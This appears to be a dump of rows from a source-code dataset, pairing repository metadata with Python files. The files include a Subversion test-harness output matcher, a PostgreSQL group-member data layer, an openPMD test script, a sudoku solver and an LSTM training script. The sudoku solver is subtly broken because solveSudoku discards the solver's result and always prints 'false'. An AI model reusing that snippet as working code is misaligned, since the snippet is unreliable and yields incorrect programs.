expected = ExpectedOutput(expected)
elif isinstance(expected, str):
expected = RegexOutput(expected, match_all)
elif isinstance(expected, int):
expected = RegexOutput(".*: E%d:.*" % expected, False)
elif expected is AnyOutput:
expected = AnyOutput()
elif expected is not None and not isinstance(expected, ExpectedOutput):
raise SVNIncorrectDatatype("Unexpected type for '%s' data" % output_type)
return expected
class ExpectedOutput(object):
"""Matches an ordered list of lines.
If MATCH_ALL is True, the expected lines must match all the actual
lines, one-to-one, in the same order. If MATCH_ALL is False, the
expected lines must match a subset of the actual lines, one-to-one,
in the same order, ignoring any other actual lines among the
matching ones.
"""
def __init__(self, expected, match_all=True):
"""Initialize the expected output to EXPECTED which is a string, or
a list of strings.
"""
assert expected is not None
self.expected = expected
self.match_all = match_all
def __str__(self):
return str(self.expected)
def __cmp__(self, other):
raise TypeError("ExpectedOutput does not implement direct comparison; "
"see the 'matches()' method")
def matches(self, actual):
"""Return whether SELF matches ACTUAL (which may be a list
of newline-terminated lines, or a single string).
"""
assert actual is not None
expected = self.expected
if not isinstance(expected, list):
expected = [expected]
if not isinstance(actual, list):
actual = [actual]
if self.match_all:
return expected == actual
i_expected = 0
for actual_line in actual:
if expected[i_expected] == actual_line:
i_expected += 1
if i_expected == len(expected):
return True
return False
def display_differences(self, message, label, actual):
"""Show the differences between the expected and ACTUAL lines. Print
MESSAGE unless it is None, the expected lines, the ACTUAL lines,
and a diff, all labeled with LABEL.
"""
display_lines(message, self.expected, actual, label, label)
display_lines_diff(self.expected, actual, label, label)
class AnyOutput(ExpectedOutput):
"""Matches any non-empty output.
"""
def __init__(self):
ExpectedOutput.__init__(self, [], False)
def matches(self, actual):
assert actual is not None
if len(actual) == 0:
# No actual output. No match.
return False
for line in actual:
# If any line has some text, then there is output, so we match.
if line:
return True
# We did not find a line with text. No match.
return False
def display_differences(self, message, label, actual):
if message:
logger.warn(message)
class RegexOutput(ExpectedOutput):
"""Matches a single regular expression.
If MATCH_ALL is true, every actual line must match the RE. If
MATCH_ALL is false, at least one actual line must match the RE. In
any case, there must be at least one line of actual output.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a regular expression string."
assert isinstance(expected, str)
ExpectedOutput.__init__(self, expected, match_all)
self.expected_re = re.compile(expected)
def matches(self, actual):
assert actual is not None
if not isinstance(actual, list):
actual = [actual]
# If a regex was provided assume that we require some actual output.
# Fail if we don't have any.
if len(actual) == 0:
return False
if self.match_all:
return all(self.expected_re.match(line) for line in actual)
else:
return any(self.expected_re.match(line) for line in actual)
def display_differences(self, message, label, actual):
display_lines(message, self.expected, actual, label + ' (regexp)', label)
class RegexListOutput(ExpectedOutput):
"""Matches an ordered list of regular expressions.
If MATCH_ALL is True, the expressions must match all the actual
lines, one-to-one, in the same order. If MATCH_ALL is False, the
expressions must match a subset of the actual lines, one-to-one, in
the same order, ignoring any other actual lines among the matching
ones.
In any case, there must be at least one line of actual output.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a list of regular expression strings."
assert isinstance(expected, list) and expected != []
ExpectedOutput.__init__(self, expected, match_all)
self.expected_res = [re.compile(e) for e in expected]
def matches(self, actual):
assert actual is not None
if not isinstance(actual, list):
actual = [actual]
if self.match_all:
return (len(self.expected_res) == len(actual) and
all(e.match(a) for e, a in zip(self.expected_res, actual)))
i_expected = 0
for actual_line in actual:
if self.expected_res[i_expected].match(actual_line):
i_expected += 1
if i_expected == len(self.expected_res):
return True
return False
def display_differences(self, message, label, actual):
display_lines(message, self.expected, actual, label + ' (regexp)', label)
class UnorderedOutput(ExpectedOutput):
"""Matches an unordered list of lines.
The expected lines must match all the actual lines, one-to-one, in
any order.
"""
def __init__(self, expected):
assert isinstance(expected, list)
ExpectedOutput.__init__(self, expected)
def matches(self, actual):
if not isinstance(actual, list):
actual = [actual]
return sorted(self.expected) == sorted(actual)
def display_differences(self, message, label, actual):
display_lines(message, self.expected, actual, label + ' (unordered)', label)
display_lines_diff(self.expected, actual, label + ' (unordered)', label)
class UnorderedRegexListOutput(ExpectedOutput):
"""Matches an unordered list of regular expressions.
The expressions must match all the actual lines, one-to-one, in any
order.
Note: This can give a false negative result (no match) when there is
an actual line that matches multiple expressions and a different
actual line that matches some but not all of those same
expressions. The implementation matches each expression in turn to
the first unmatched actual line that it can match, and does not try
all the permutations when there are multiple possible matches.
"""
def __init__(self, expected):
assert isinstance(expected, list)
ExpectedOutput.__init__(self, expected)
def matches(self, actual):
assert actual is not None
if not isinstance(actual, list):
actual = [actual]
if len(self.expected) != len(actual):
return False
for e in self.expected:
expect_re = re.compile(e)
for actual_line in actual:
if expect_re.match(actual_line):
actual.remove(actual_line)
break
else:
# One of the regexes was not found
return False
return True
def display_differences(self, message, label, actual):
display_lines(message, self.expected, actual,
label + ' (regexp) (unordered)', label)
class AlternateOutput(ExpectedOutput):
"""Matches any one of a list of ExpectedOutput instances.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a list of ExpectedOutput instances."
assert isinstance(expected, list) and expected != []
assert all(isinstance(e, ExpectedOutput) for e in expected)
ExpectedOutput.__init__(self, expected)
def matches(self, actual):
assert actual is not None
for e in self.expected:
if e.matches(actual):
return True
return False
def display_differences(self, message, label, actual):
# For now, just display differences against the first alternative.
e = self.expected[0]
e.display_differences(message, label, actual)
######################################################################
# Displaying expected and actual output
def display_trees(message, label, expected, actual):
'Print two trees, expected and actual.'
if message is not None:
logger.warn(message)
if expected is not None:
logger.warn('EXPECTED %s:', label)
svntest.tree.dump_tree(expected)
if actual is not None:
logger.warn('ACTUAL %s:', label)
svntest.tree.dump_tree(actual)
def display_lines_diff(expected, actual, expected_label, actual_label):
"""Print a unified diff between EXPECTED (labeled with EXPECTED_LABEL)
and ACTUAL (labeled with ACTUAL_LABEL).
Each of EXPECTED and ACTUAL is a string or a list of strings.
"""
if not isinstance(expected, list):
expected = [expected]
if not isinstance(actual, list):
actual = [actual]
logger.warn('DIFF ' + expected_label + ':')
for x in unified_diff(expected, actual,
fromfile='EXPECTED ' + expected_label,
tofile='ACTUAL ' + actual_label):
logger.warn('| ' + x.rstrip())
def display_lines(message, expected, actual,
expected_label, actual_label=None):
"""Print MESSAGE, unless it is None, then print EXPECTED (labeled
with EXPECTED_LABEL) followed by ACTUAL (labeled with ACTUAL_LABEL).
Each of EXPECTED and ACTUAL is a string or a list of strings.
"""
if message is not None:
logger.warn(message)
if type(expected) is str:
expected = [expected]
if type(actual) is str:
actual = [actual]
if actual_label is None:
actual_label = expected_label
if expected is not None:
logger.warn('EXPECTED %s:', expected_label)
for x in expected:
logger.warn('| ' + x.rstrip())
if actual is not None:
logger.warn('ACTUAL %s:', actual_label)
for x in actual:
logger.warn('| ' + x.rstrip())
def compare_and_display_lines(message, label, expected, actual,
raisable=None):
"""Compare two sets of output lines, and print them if they differ,
preceded by MESSAGE iff not None. EXPECTED may be an instance of
ExpectedOutput (and if not, it is wrapped as such). ACTUAL may be a
list of newline-terminated lines, or a single string. RAISABLE is an
exception class, an instance of which is thrown if ACTUAL doesn't
match EXPECTED."""
if raisable is None:
raisable = svntest.main.SVNLineUnequal
### It'd be nicer to use createExpectedOutput() here, but its
### semantics don't match all current consumers of this function.
assert expected is not None
assert actual is not None
if not isinstance(expected, ExpectedOutput):
expected = ExpectedOutput(expected)
if isinstance(actual, str):
actual = [actual]
actual = svntest.main.filter_dbg(actual)
if not expected.matches(actual):
expected.display_differences(message, label, actual)
raise raisable
def verify_outputs(message, actual_stdout, actual_stderr,
expected_stdout, expected_stderr, all_stdout=True):
"""Compare and display expected vs. actual stderr and stdout lines:
if they don't match, print the difference (preceded by MESSAGE iff
not None) and raise an exception.
If EXPECTED_STDERR or EXPECTED_STDOUT is a string the string is
interpreted as a regular expression. For EXPECTED_STDOUT and
ACTUAL_STDOUT to match, every line in ACTUAL_STDOUT must match the
EXPECTED_STDOUT regex, unless ALL_STDOUT is false. For
EXPECTED_STDERR regexes only one line in ACTUAL_STDERR need match."""
expected_stderr = createExpectedOutput(expected_stderr, 'stderr', False)
expected_stdout = createExpectedOutput(expected_stdout, 'stdout', all_stdout)
for (actual, expected, label, raisable) in (
(actual_stderr, expected_stderr, 'STDERR', SVNExpectedStderr),
(actual_stdout, expected_stdout, 'STDOUT', SVNExpectedStdout)):
if expected is None:
continue
if isinstance(expected, RegexOutput):
raisable = svntest.main.SVNUnmatchedError
elif not isinstance(expected, AnyOutput):
raisable = svntest.main.SVNLineUnequal
compare_and_display_lines(message, label, expected, actual, raisable)
def verify_exit_code(message, actual, expected,
raisable=SVNUnexpectedExitCode):
"""Compare and display expected vs. actual exit codes:
if they don't match, print the difference (preceded by MESSAGE iff
not None) and raise an exception."""
if expected != actual:
display_lines(message, str(expected), str(actual), "Exit Code")
raise raisable
# A simple dump file parser. While sufficient for the current
# testsuite it doesn't cope with all valid dump files.
class DumpParser:
def __init__(self, lines):
self.current = 0
self.lines = lines
self.parsed = {}
def parse_line(self, regex, required=True):
m = re.match(regex, self.lines[self.current])
if not m:
if required:
raise SVNDumpParseError("expected '%s' at line %d\n%s"
% (regex, self.current,
self.lines[self.current]))
else:
return None
self.current += 1
return m.group(1)
def parse_blank(self, required=True):
if self.lines[self.current] != '\n': # Works on Windows
if required:
raise SVNDumpParseError("expected blank at line %d\n%s"
% (self.current, self.lines[self.current]))
else:
return False
self.current += 1
return True
def parse_format(self):
return self.parse_line('SVN-fs-dump-format-version: ([0-9]+)$')
def parse_uuid(self):
return self.parse_line('UUID: ([0-9a-z-]+)$')
def parse_revision(self):
return self.parse_line('Revision-number: ([0-9]+)$')
def parse_prop_length(self, required=True):
return self.parse_line('Prop-content-length: ([0-9]+)$', required)
def parse_content_length(self, required=True):
return self.parse_line('Content-length: ([0-9]+)$', required)
def parse_path(self):
path = self.parse_line('Node-path: (.+)$', required=False)
if not path and self.lines[self.current] == 'Node-path: \n':
self.current += 1
path = ''
return path
def parse_kind(self):
return self.parse_line('Node-kind: (.+)$', required=False)
def parse_action(self):
return self.parse_line('Node-action: ([0-9a-z-]+)$')
def parse_copyfrom_rev(self):
return self.parse_line('Node-copyfrom-rev: ([0-9]+)$', required=False)
def parse_copyfrom_path(self):
path = self.parse_line('Node-copyfrom-path: (.+)$', required=False)
if not path and self.lines[self.current] == 'Node-copyfrom-path: \n':
self.current += 1
path = ''
return path
def parse_copy_md5(self):
return self.parse_line('Text-copy-source-md5: ([0-9a-z]+)$', required=False)
def parse_copy_sha1(self):
return self.parse_line('Text-copy-source-sha1: ([0-9a-z]+)$', required=False)
def parse_text_md5(self):
return self.parse_line('Text-content-md5: ([0-9a-z]+)$', required=False)
def parse_text_sha1(self):
return self.parse_line('Text-content-sha1: ([0-9a-z]+)$', required=False)
def parse_text_length(self):
return self.parse_line('Text-content-length: ([0-9]+)$', required=False)
# One day we may need to parse individual property name/values into a map
def get_props(self):
props = []
while not re.match('PROPS-END$', self.lines[self.current]):
props.append(self.lines[self.current])
self.current += 1
self.current += 1
return props
def get_content(self, length):
content = ''
while len(content) < length:
content += self.lines[self.current]
self.current += 1
if len(content) == length + 1:
content = content[:-1]
elif len(content) != length:
raise SVNDumpParseError("content length expected %d actual %d at line %d"
% (length, len(content), self.current))
return content
def parse_one_node(self):
node = {}
node['kind'] = self.parse_kind()
action = self.parse_action()
node['copyfrom_rev'] = self.parse_copyfrom_rev()
node['copyfrom_path'] = self.parse_copyfrom_path()
node['copy_md5'] = self.parse_copy_md5()
node['copy_sha1'] = self.parse_copy_sha1()
node['prop_length'] = self.parse_prop_length(required=False)
node['text_length'] = self.parse_text_length()
node['text_md5'] = self.parse_text_md5()
node['text_sha1'] = self.parse_text_sha1()
node['content_length'] = self.parse_content_length(required=False)
self.parse_blank()
if node['prop_length']:
node['props'] = self.get_props()
if node['text_length']:
node['content'] = self.get_content(int(node['text_length']))
# Hard to determine how may blanks is 'correct' (a delete that is
# followed by an add that is a replace and a copy has one fewer
# than expected but that can't be predicted until seeing the add)
# so allow arbitrary number
blanks = 0
while self.current < len(self.lines) and self.parse_blank(required=False):
blanks += 1
node['blanks'] = blanks
return action, node
def parse_all_nodes(self):
nodes = {}
while True:
if self.current >= len(self.lines):
break
path = self.parse_path()
if not path and not path is '':
break
if not nodes.get(path):
nodes[path] = {}
action, node = self.parse_one_node()
if nodes[path].get(action):
raise SVNDumpParseError("duplicate action '%s' for node '%s' at line %d"
% (action, path, self.current))
nodes[path][action] = node
return nodes
def parse_one_revision(self):
revision = {}
number = self.parse_revision()
revision['prop_length'] = self.parse_prop_length()
revision['content_length'] = self.parse_content_length()
self.parse_blank()
revision['props'] = self.get_props()
self.parse_blank()
revision['nodes'] = self.parse_all_nodes()
return number, revision
def parse_all_revisions(self):
while self.current < len(self.lines):
number, revision = self.parse_one_revision()
if self.parsed.get(number):
raise SVNDumpParseError("duplicate revision %d at line %d"
% (number, self.current))
self.parsed[number] = revision
def parse(self):
self.parsed['format'] = self.parse_format()
self.parse_blank()
self.parsed['uuid'] = self.parse_uuid()
self.parse_blank()
self.parse_all_revisions()
return self.parsed
def compare_dump_files(message, label, expected, actual):
"""Parse two dump files EXPECTED and ACTUAL, both of which are lists
of lines as returned by run_and_verify_dump, and check that the same
revisions, nodes, properties, etc. are present in both dumps.
"""
parsed_expected = DumpParser(expected).parse()
parsed_actual = DumpParser(actual).parse()
if parsed_expected != parsed_actual:
raise svntest.Failure('\n' + '\n'.join(ndiff(
pprint.pformat(parsed_expected).splitlines(),
pprint.pformat(parsed_actual).splitlines())))
| 8,255 | -4 | 1,070 |
0c071ed9df41f466f5e5d41975bd46e5709e4a48 | 321 | py | Python | furnace/seg_opr/sync_bn/src/cpu/setup.py | aurora95/RGBD_Semantic_Segmentation_PyTorch | b25ec3b398d7199386abd043a667c347df80884c | [
"MIT"
] | 1,439 | 2019-01-23T08:40:57.000Z | 2022-03-31T14:02:22.000Z | furnace/seg_opr/sync_bn/src/cpu/setup.py | aurora95/RGBD_Semantic_Segmentation_PyTorch | b25ec3b398d7199386abd043a667c347df80884c | [
"MIT"
] | 112 | 2019-01-25T02:31:26.000Z | 2021-09-23T08:42:37.000Z | furnace/seg_opr/sync_bn/src/cpu/setup.py | aurora95/RGBD_Semantic_Segmentation_PyTorch | b25ec3b398d7199386abd043a667c347df80884c | [
"MIT"
] | 287 | 2019-01-23T10:39:37.000Z | 2022-03-17T13:31:16.000Z | from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CppExtension
setup(
name='syncbn_cpu',
ext_modules=[
CppExtension('syncbn_cpu', [
'operator.cpp',
'syncbn_cpu.cpp',
]),
],
cmdclass={
'build_ext': BuildExtension
})
| 21.4 | 66 | 0.595016 | from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CppExtension
setup(
name='syncbn_cpu',
ext_modules=[
CppExtension('syncbn_cpu', [
'operator.cpp',
'syncbn_cpu.cpp',
]),
],
cmdclass={
'build_ext': BuildExtension
})
| 0 | 0 | 0 |
58e28e7b82d4f2753a7aaff2d479384d4cbc9beb | 6,605 | py | Python | core/recc/database/postgresql/mixin/pg_group_member.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | 3 | 2021-06-20T02:24:10.000Z | 2022-01-26T23:55:33.000Z | core/recc/database/postgresql/mixin/pg_group_member.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | core/recc/database/postgresql/mixin/pg_group_member.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from typing import List
from overrides import overrides
from recc.log.logging import recc_database_logger as logger
from recc.database.struct.group_member import GroupMember
from recc.database.struct.group_join_member import (
GroupJoinGroupMember,
ProjectJoinGroupMember,
)
from recc.database.interfaces.db_group_member import DbGroupMember
from recc.database.postgresql.mixin.pg_base import PgBase
from recc.database.postgresql.query.group_member import (
INSERT_GROUP_MEMBER,
UPDATE_GROUP_MEMBER_PERMISSION,
DELETE_GROUP_MEMBER,
SELECT_GROUP_MEMBER_BY_GROUP_UID_AND_USER_UID,
SELECT_GROUP_MEMBER_BY_GROUP_UID,
SELECT_GROUP_MEMBER_BY_USER_UID,
SELECT_GROUP_MEMBER_ALL,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID_AND_GROUP_UID,
SELECT_GROUP_MEMBER_JOIN_PROJECT_BY_USER_UID,
)
| 42.339744 | 87 | 0.671915 | # -*- coding: utf-8 -*-
from typing import List
from overrides import overrides
from recc.log.logging import recc_database_logger as logger
from recc.database.struct.group_member import GroupMember
from recc.database.struct.group_join_member import (
GroupJoinGroupMember,
ProjectJoinGroupMember,
)
from recc.database.interfaces.db_group_member import DbGroupMember
from recc.database.postgresql.mixin.pg_base import PgBase
from recc.database.postgresql.query.group_member import (
INSERT_GROUP_MEMBER,
UPDATE_GROUP_MEMBER_PERMISSION,
DELETE_GROUP_MEMBER,
SELECT_GROUP_MEMBER_BY_GROUP_UID_AND_USER_UID,
SELECT_GROUP_MEMBER_BY_GROUP_UID,
SELECT_GROUP_MEMBER_BY_USER_UID,
SELECT_GROUP_MEMBER_ALL,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID,
SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID_AND_GROUP_UID,
SELECT_GROUP_MEMBER_JOIN_PROJECT_BY_USER_UID,
)
class PgGroupMember(DbGroupMember, PgBase):
@overrides
async def insert_group_member(
self, group_uid: int, user_uid: int, permission_uid: int
) -> None:
query = INSERT_GROUP_MEMBER
await self.execute(query, group_uid, user_uid, permission_uid)
params_msg1 = f"group_uid={group_uid},user_uid={user_uid}"
params_msg2 = f"permission_uid={permission_uid}"
params_msg = f"{params_msg1},{params_msg2}"
logger.info(f"insert_group_member({params_msg}) ok.")
@overrides
async def update_group_member_permission(
self, group_uid: int, user_uid: int, permission_uid: int
) -> None:
query = UPDATE_GROUP_MEMBER_PERMISSION
await self.execute(query, group_uid, user_uid, permission_uid)
params_msg1 = f"group_uid={group_uid},user_uid={user_uid}"
params_msg2 = f"permission_uid={permission_uid}"
params_msg = f"{params_msg1},{params_msg2}"
logger.info(f"update_group_member_permission({params_msg}) ok.")
@overrides
async def delete_group_member(self, group_uid: int, user_uid: int) -> None:
query = DELETE_GROUP_MEMBER
await self.execute(query, group_uid, user_uid)
params_msg = f"group_uid={group_uid},user_uid={user_uid}"
logger.info(f"delete_group_member({params_msg}) ok.")
@overrides
async def select_group_member(self, group_uid: int, user_uid: int) -> GroupMember:
query = SELECT_GROUP_MEMBER_BY_GROUP_UID_AND_USER_UID
row = await self.fetch_row(query, group_uid, user_uid)
params_msg = f"group_uid={group_uid},user_uid={user_uid}"
if not row:
raise RuntimeError(f"Not found group member: {params_msg}")
assert len(row) == 1
result = GroupMember(**dict(row))
result.group_uid = group_uid
result.user_uid = user_uid
logger.info(f"select_group_member({params_msg}) ok.")
return result
@overrides
async def select_group_members_by_group_uid(
self, group_uid: int
) -> List[GroupMember]:
result: List[GroupMember] = list()
async with self.conn() as conn:
async with conn.transaction():
query = SELECT_GROUP_MEMBER_BY_GROUP_UID
async for row in conn.cursor(query, group_uid):
item = GroupMember(**dict(row))
item.group_uid = group_uid
result.append(item)
result_msg = f"{len(result)} group members"
logger.info(f"select_group_member_by_group_uid() -> {result_msg}")
return result
@overrides
async def select_group_members_by_user_uid(
self, user_uid: int
) -> List[GroupMember]:
result: List[GroupMember] = list()
async with self.conn() as conn:
async with conn.transaction():
query = SELECT_GROUP_MEMBER_BY_USER_UID
async for row in conn.cursor(query, user_uid):
item = GroupMember(**dict(row))
item.user_uid = user_uid
result.append(item)
result_msg = f"{len(result)} group members"
logger.info(f"select_group_member_by_user_uid() -> {result_msg}")
return result
@overrides
async def select_group_members(self) -> List[GroupMember]:
result: List[GroupMember] = list()
async with self.conn() as conn:
async with conn.transaction():
query = SELECT_GROUP_MEMBER_ALL
async for row in conn.cursor(query):
result.append(GroupMember(**dict(row)))
result_msg = f"{len(result)} group members"
logger.info(f"select_group_members() -> {result_msg}")
return result
@overrides
async def select_group_members_join_group_by_user_uid(
self, user_uid: int
) -> List[GroupJoinGroupMember]:
result: List[GroupJoinGroupMember] = list()
async with self.conn() as conn:
async with conn.transaction():
query = SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID
async for row in conn.cursor(query, user_uid):
result.append(GroupJoinGroupMember(**dict(row)))
result_msg = f"{len(result)} group members"
logger.info(f"select_group_members_join_group_by_user_uid() -> {result_msg}")
return result
@overrides
async def select_group_member_join_group_by_user_uid_and_group_uid(
self, user_uid: int, group_uid: int
) -> GroupJoinGroupMember:
query = SELECT_GROUP_MEMBER_JOIN_GROUP_BY_USER_UID_AND_GROUP_UID
row = await self.fetch_row(query, user_uid, group_uid)
params_msg = f"user_uid={user_uid},group_uid={group_uid}"
if not row:
raise RuntimeError(f"Not found group member: {params_msg}")
result = GroupJoinGroupMember(**dict(row))
func_name = "select_group_member_join_group_by_user_uid_and_group_uid"
logger.info(f"{func_name}({params_msg}) ok.")
return result
@overrides
async def select_group_members_join_project_by_user_uid(
self, user_uid: int
) -> List[ProjectJoinGroupMember]:
result: List[ProjectJoinGroupMember] = list()
async with self.conn() as conn:
async with conn.transaction():
query = SELECT_GROUP_MEMBER_JOIN_PROJECT_BY_USER_UID
async for row in conn.cursor(query, user_uid):
result.append(ProjectJoinGroupMember(**dict(row)))
result_msg = f"{len(result)} group members"
logger.info(f"select_group_members_join_project_by_user_uid() -> {result_msg}")
return result
| 5,246 | 441 | 23 |
99592ccd5d8bc11fb6dd4dfaba6811b648b23da0 | 62 | py | Python | podman/config.py | anushkrishnav/QiskitBot | 1aa2bca3f123a6f5d1c153306df8e1c7906f3394 | [
"MIT"
] | 26 | 2021-01-01T04:59:46.000Z | 2021-11-17T10:21:12.000Z | podman/config.py | anushkrishnav/QiskitBot | 1aa2bca3f123a6f5d1c153306df8e1c7906f3394 | [
"MIT"
] | null | null | null | podman/config.py | anushkrishnav/QiskitBot | 1aa2bca3f123a6f5d1c153306df8e1c7906f3394 | [
"MIT"
] | 3 | 2021-05-17T23:14:13.000Z | 2021-07-28T06:50:27.000Z | PREFIX = '!?'
TOKEN = ''
IMAGE = 'qiskitbot'
BLACKLIST = ['']
| 12.4 | 19 | 0.548387 | PREFIX = '!?'
TOKEN = ''
IMAGE = 'qiskitbot'
BLACKLIST = ['']
| 0 | 0 | 0 |
4cd48a2c66843372ff101898130ccd57eae579b8 | 954 | py | Python | Examples/Tests/openpmd_rz/analysis_openpmd_rz.py | hklion/WarpX | 3c2d0ee2815ab1df21b9f78d899fe7b1a9651758 | [
"BSD-3-Clause-LBNL"
] | null | null | null | Examples/Tests/openpmd_rz/analysis_openpmd_rz.py | hklion/WarpX | 3c2d0ee2815ab1df21b9f78d899fe7b1a9651758 | [
"BSD-3-Clause-LBNL"
] | null | null | null | Examples/Tests/openpmd_rz/analysis_openpmd_rz.py | hklion/WarpX | 3c2d0ee2815ab1df21b9f78d899fe7b1a9651758 | [
"BSD-3-Clause-LBNL"
] | null | null | null | #!/usr/bin/env python3
import openpmd_api as io
series = io.Series("LaserAccelerationRZ_opmd_plt/openpmd_%T.h5", io.Access.read_only)
assert len(series.iterations) == 3, 'improper number of iterations stored'
ii = series.iterations[20]
assert len(ii.meshes) == 7, 'improper number of meshes'
# select j_t
jt = ii.meshes['j']['t']
# this is in C (Python) order; r is the fastest varying index
(Nm, Nz, Nr) = jt.shape
assert Nm == 3, 'Wrong number of angular modes stored or possible incorrect ordering when flushed'
assert Nr == 64, 'Wrong number of radial points stored or possible incorrect ordering when flushed'
assert Nz == 512, 'Wrong number of z points stored or possible incorrect ordering when flushed'
assert ii.meshes['part_per_grid'][io.Mesh_Record_Component.SCALAR].shape == [512,64], 'problem with part_per_grid'
assert ii.meshes['rho_electrons'][io.Mesh_Record_Component.SCALAR].shape == [3, 512, 64], 'problem with rho_electrons'
| 38.16 | 118 | 0.751572 | #!/usr/bin/env python3
import openpmd_api as io
series = io.Series("LaserAccelerationRZ_opmd_plt/openpmd_%T.h5", io.Access.read_only)
assert len(series.iterations) == 3, 'improper number of iterations stored'
ii = series.iterations[20]
assert len(ii.meshes) == 7, 'improper number of meshes'
# select j_t
jt = ii.meshes['j']['t']
# this is in C (Python) order; r is the fastest varying index
(Nm, Nz, Nr) = jt.shape
assert Nm == 3, 'Wrong number of angular modes stored or possible incorrect ordering when flushed'
assert Nr == 64, 'Wrong number of radial points stored or possible incorrect ordering when flushed'
assert Nz == 512, 'Wrong number of z points stored or possible incorrect ordering when flushed'
assert ii.meshes['part_per_grid'][io.Mesh_Record_Component.SCALAR].shape == [512,64], 'problem with part_per_grid'
assert ii.meshes['rho_electrons'][io.Mesh_Record_Component.SCALAR].shape == [3, 512, 64], 'problem with rho_electrons'
| 0 | 0 | 0 |
4f8d1be2f84946250f10e20b9a4435d198236e44 | 92 | py | Python | muria/version.py | xakiy/muria | 0d16ae02f65d2a4b8cfe31419a4d9343ccbe6905 | [
"MIT"
] | 1 | 2020-02-10T00:12:27.000Z | 2020-02-10T00:12:27.000Z | muria/version.py | xakiy/muria | 0d16ae02f65d2a4b8cfe31419a4d9343ccbe6905 | [
"MIT"
] | 8 | 2019-12-07T16:48:08.000Z | 2021-08-31T06:31:34.000Z | muria/version.py | xakiy/muria | 0d16ae02f65d2a4b8cfe31419a4d9343ccbe6905 | [
"MIT"
] | null | null | null | name = 'Muria'
version = '0.5.3'
author = 'Ahmad Ghulam Zakiy <https://twitter.com/xakiy>'
| 23 | 58 | 0.663043 | name = 'Muria'
version = '0.5.3'
author = 'Ahmad Ghulam Zakiy <https://twitter.com/xakiy>'
| 0 | 0 | 0 |
a31f821d50afa26d576557149e66f9293e22c3b9 | 1,053 | py | Python | Project.py | JaikV/Sudoku-Solver- | b4bf1c13bb796c374b176ac702d3ba2ffde271b8 | [
"MIT"
] | null | null | null | Project.py | JaikV/Sudoku-Solver- | b4bf1c13bb796c374b176ac702d3ba2ffde271b8 | [
"MIT"
] | null | null | null | Project.py | JaikV/Sudoku-Solver- | b4bf1c13bb796c374b176ac702d3ba2ffde271b8 | [
"MIT"
] | null | null | null | from sys import stdin, setrecursionlimit
setrecursionlimit(10**7)
# Function to check all the valid way to solve the sudoku.
board = [[ int(ele) for ele in input().split() ]for i in range(9)]
ans = solveSudoku(board)
if ans is True:
print('true')
else:
print('false')
| 19.5 | 75 | 0.522317 | from sys import stdin, setrecursionlimit
setrecursionlimit(10**7)
def canPut(sudoku, row, col, num):
for i in range(9):
if(sudoku[i][col] == num or sudoku[row][i] == num):
return False
if(sudoku[3 * (row // 3) + i // 3][3 * (col // 3) + i % 3] == num):
return False
return True
# Function to check all the valid way to solve the sudoku.
def backTrack(sudoku, i, j):
if (j == 9):
if (i == 8):
return True
j = 0
i += 1
if (sudoku[i][j] != 0):
return backTrack(sudoku, i, j + 1)
# Trying all possible values.
for put in range(1, 10):
if (canPut(sudoku, i, j, put)):
sudoku[i][j] = put
if (backTrack(sudoku, i, j + 1)):
return True
sudoku[i][j] = 0
return False
def solveSudoku(sudoku):
backTrack(sudoku, 0, 0)
board = [[ int(ele) for ele in input().split() ]for i in range(9)]
ans = solveSudoku(board)
if ans is True:
print('true')
else:
print('false')
| 703 | 0 | 68 |
9fa3aba7df20e09b501665c510f94e4da52d2f16 | 13,389 | py | Python | lstm/src/language_models/ngram_lstm.py | brightp-py/rnng-and-rts | c1251de9bd4c35531cb46dbfb8b2c989ab5a1f33 | [
"MIT"
] | 1 | 2021-02-20T17:24:35.000Z | 2021-02-20T17:24:35.000Z | lstm/src/language_models/ngram_lstm.py | brightp-py/rnng-and-rts | c1251de9bd4c35531cb46dbfb8b2c989ab5a1f33 | [
"MIT"
] | null | null | null | lstm/src/language_models/ngram_lstm.py | brightp-py/rnng-and-rts | c1251de9bd4c35531cb46dbfb8b2c989ab5a1f33 | [
"MIT"
] | null | null | null | # Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
import argparse
import logging
import math
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dictionary_corpus import Corpus, Dictionary, tokenize
from utils import batchify
import lm_argparser
parser = argparse.ArgumentParser(parents=[lm_argparser.lm_parser],
description="Training and testing ngram LSTM model")
parser.add_argument('--train', action='store_true', default=False,
help='enable training regime')
parser.add_argument('--test', action='store_true', default=False,
help='enable testing regime')
parser.add_argument('--test_path', type=str,
help='path to test file, gold file and vocab file output')
parser.add_argument('--suffix', type=str,
help='suffix for generated output files which will be saved as path.output_suffix')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO, handlers=[logging.StreamHandler(),
logging.FileHandler(args.log)])
logging.info(args)
class RNNModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder.
ntoken: vocab size
nip: embedding size
"""
###############################################################################
# Training code
###############################################################################
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
else:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
if args.train:
logging.info("Loading data")
corpus = Corpus(args.data)
# logging.info(corpus.train)
ntokens = len(corpus.dictionary)
logging.info("Vocab size %d", ntokens)
logging.info("Batchying..")
eval_batch_size = 256
train_data = batchify(corpus.train, args.batch_size, args.cuda)
# logging.info("Train data size", train_data.size())
val_data = batchify(corpus.valid, eval_batch_size, args.cuda)
test_data = batchify(corpus.test, eval_batch_size, args.cuda)
logging.info("Building the model")
